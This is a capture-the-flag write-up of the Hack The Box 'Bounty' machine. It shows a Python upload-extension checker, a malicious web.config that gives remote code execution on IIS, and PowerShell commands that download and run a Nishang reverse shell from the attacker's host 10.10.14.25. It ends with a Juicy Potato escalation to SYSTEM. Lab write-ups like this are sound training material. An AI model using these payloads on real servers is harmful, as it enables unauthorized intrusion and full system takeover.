[HTB] Bounty — Writeup

Initial Recon

Nmap

$ nmap -Pn --open -sC -sV -p- 10.10.10.93PORT   STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Interesting Ports to Note

Web Directory Enumeration (dirsearch)

$ python3 dirsearch.py -u http://10.10.10.93/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e asp,aspx,txt,html | grep '200\|301\|302'[19:28:07] 200 -  630B  - /
[19:32:48] 301 - 156B - /UploadedFiles -> http://10.10.10.93/UploadedFiles/
[19:33:50] 301 - 156B - /uploadedFiles -> http://10.10.10.93/uploadedFiles/
[19:37:56] 200 - 974B - /transfer.aspx -> /transfer.aspx

Initial Foothold

File Upload Extension Bypass

ASPX Webshell

Allowed File Extension Check

$ cat extension.txt 
png
jpg
php
php5
php7
phtml
txt
html
asp
aspx
exe
config
js
#!/usr/bin/python3import requests
import sys
import re
from bs4 import BeautifulSoup
url = "http://10.10.10.93/transfer.aspx"
filename = "extension.txt"
def upload(f):
s = requests.Session()
r = s.get(url)
#if r.status_code == 200:
# print("[INFO] Checking...{0}".format(f))
#else:
# print("[ERROR] Can't connect...")
# sys.exit(1)
p = BeautifulSoup(r.content, "html.parser") viewState = p.find(attrs = {'name' : '__VIEWSTATE'})['value']
eventValidation = p.find(attrs = {'name' : '__EVENTVALIDATION'})['value']
postData = {
'__VIEWSTATE' : viewState,
'__EVENTVALIDATION' : eventValidation,
'btnUpload' : 'Upload'
}
uploadedFile = {'FileUpload1' : (f, 'test')} r = s.post(url, files=uploadedFile, data=postData)
return r.text
print("[INFO] Allowed Extensions:")for i in open(filename, 'r'):
#print(i[:-1])
response = upload('bigb0ss.' + i[:-1])
if "successfully" in response:
print("[+] %s" % i.strip())
$ python3 checker.py 
[INFO] Allowed Extensions:
[+] png
[+] jpg
[+] config

web.config (RCE)

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!-- ASP code comes here
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
<!-- ASP code comes here
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->

web.config (Reverse Shell)

$ cp /opt/windows/nishang/Shells/Invoke-PowerShellTcp.ps1 revShell.ps1
$ vi revShell.ps1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.25 -Port 9001
<!-- ASP code comes here
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.25/revShell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->

user.txt

PS C:\users\merlin\Desktop> dir -force
Directory: C:\users\merlin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs 5/30/2018 12:22 AM 282 desktop.ini
-a-h- 5/30/2018 11:32 PM 32 user.txt
PS C:\users\merlin\Desktop> more user.txt
e29a***REDACTED***4a2f

Privilege Escalation

merlin → administrator (Juicy Potato)

PS C:\users\merlin\Desktop> systeminfoHost Name:                 BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 11/16/2020, 1:48:20 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,547 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,583 MB
Virtual Memory: In Use: 512 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
PS C:\users\merlin\Desktop> whoami /privPRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Juicy Potato Attack

PS C:\users\merlin\Desktop> powershell.exe -c IEX(new-object net.webclient).downloadfile('http://10.10.14.25/JuicyPotato.exe', 'C:\Users\merlin\Desktop\juicy.exe')PS C:\users\merlin\Desktop> dir
Directory: C:\users\merlin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/16/2020 6:01 AM 347648 juicy.exe
powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.25/revShell-juicy.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.25 -Port 6666
PS C:\users\merlin\Desktop> powershell.exe -c IEX(new-object net.webclient).downloadfile('http://10.10.14.25/exploit.bat', 'C:\Users\merlin\Desktop\exploit.bat')PS C:\users\merlin\Desktop> dir
Directory: C:\users\merlin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/16/2020 6:20 AM 99 exploit.bat
-a--- 11/16/2020 6:01 AM 347648 juicy.exe
PS C:\users\merlin\desktop> ./juicy.exe -t * -p exploit.bat -l 4444
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 4444
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
$ python3 -m http.server 80
10.10.10.93 - - [15/Nov/2020 23:29:57] "GET /revShell-juicy.ps1 HTTP/1.1" 200 -

root.txt

$ nc -lvnp 6666
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.10.93.
Ncat: Connection from 10.10.10.93:49198.
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> cd c:\users\administrator\desktop
PS C:\users\administrator\desktop> dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 5/31/2018 12:18 AM 32 root.txt
PS C:\users\administrator\desktop> cat root.txt
c837***REDACTED***f5ea

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store